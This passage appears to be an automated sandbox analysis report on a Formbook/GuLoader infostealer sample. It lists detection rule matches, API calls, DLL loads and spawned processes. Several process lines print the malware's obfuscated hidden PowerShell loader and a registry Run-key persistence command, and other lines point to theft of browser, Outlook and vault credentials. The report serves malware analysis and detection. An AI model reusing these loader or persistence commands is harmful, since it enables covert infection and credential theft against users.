        Source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/13@4/4
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B3
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_00404766 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404766
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_00402173 CoCreateInstance,MultiByteToWideChar,0_2_00402173
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeFile created: C:\Users\user\AppData\Local\Temp\nsnA2B.tmpJump to behavior
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: cmd.exe, 0000000E.00000002.2614682827.0000000000962000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2614682827.0000000000958000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2350094315.0000000000958000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2349933593.0000000000937000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2614682827.0000000000985000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeReversingLabs: Detection: 50%
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeVirustotal: Detection: 57%
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Overfondle.exe "C:\Users\user\AppData\Local\Temp\Overfondle.exe"
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Overfondle.exe "C:\Users\user\AppData\Local\Temp\Overfondle.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"Jump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: psiloses.lnk.0.drLNK file: ..\..\Users\user\Music\forbindingers.Bam132
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2075195434.0000000008A34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2069285687.0000000007840000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615448213.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2233571308.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp
        Source: Binary string: wntdll.pdbUGP source: Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: cmd.pdbUGP source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Overfondle.exe, Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: cmd.pdb source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000002.00000002.2075682584.0000000009E59000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
